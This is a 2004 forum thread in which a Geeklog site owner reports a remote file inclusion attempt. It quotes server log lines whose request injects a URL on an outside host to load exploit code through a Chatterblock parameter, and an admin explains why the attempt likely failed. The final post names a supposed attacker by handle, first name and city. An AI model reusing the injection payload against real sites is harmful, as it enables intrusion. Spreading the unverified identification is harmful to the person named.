Welcome to Geeklog, Anonymous Monday, December 23 2024 @ 09:09 am EST

Geeklog Forums

Attention


Profetas

Anonymous
Attention I have detected some attack attempts this mornig and it is coming from http://mail.omd.it/ using a cross script

here is the log file
200.140.13.120 - - [07/Jul/2004:21:38:59 +0100] "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0" 404 225
200.140.13.120 - "GET /chatterblock/cb_chatLog.php?show=http://mail.omd.it/cmd1.txt?&cmd=id HTTP/1.0"

as you can see they tried to use the cmd1.txt if you check the following URL http://mail.omd.it/cmd1.txt you'll see the code which I haven't examined yet
 Quote

Profetas

Anonymous
*censored* me, I think the omd has been hacked and the guy redirected the page to my site. if you go to http://omd.it it will go to my site. WTF
 Quote

Status: offline

profetas

Forum User
Newbie
Registered: 05/05/04
Posts: 5
I have blocked them on my server. but something is going on. I didn't have my chatterblock enabled that is what stoped them from uploading the exploit into my server.
 Quote

ill

Anonymous
Well spotted! Anyone got geeklog on a test server to check this out?
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
The cmd1.txt contains the C source code for a Linux kernel exploit. So it looks like that if this somehow gets executed, it's trying to compile and run that exploit (probably to get root access on the webserver).

Of course, anybody running a webserver on Linux should have updated their kernel by now (the exploit seems to be old) ...

I'm not sure what the Chatterblock does with that manipulated URL, so it's possible that it's not run at all. In any case, it wouldn't hurt to hide your Chatterblock from anonymous users (go to the Admin's blocks menu and uncheck the "Anonymous R" checkbox for the Chatterblock).

bye, Dirk
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
After a quick look through the source for cb_chatLog.php I have to doubt that anything was or would be executed here. The "show" parameter is used as a numeric value in the Chatterblock, doing some calculations, for example.

So to me, this looks pretty harmless.

We're actually seeing quite a lot of these attempts to stick URLs into parameters. But since Geeklog (and, it seems, the Chatterblock) won't visit those URLs on its own, these "hacking attempts" (if you can even call them that) won't accomplish anything.

bye, Dirk
 Quote

Profetas

Anonymous
I found who are these people
his handle is magnific
here
here
he's rooted a lot of machines including the one he used to attack me.

his name is rodrigo and I almost have the place where he studies he lives at a city called Sao Jose dos Campos SP he is a brazilian hacker.
 Quote

All times are EST. The time is now 09:09 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content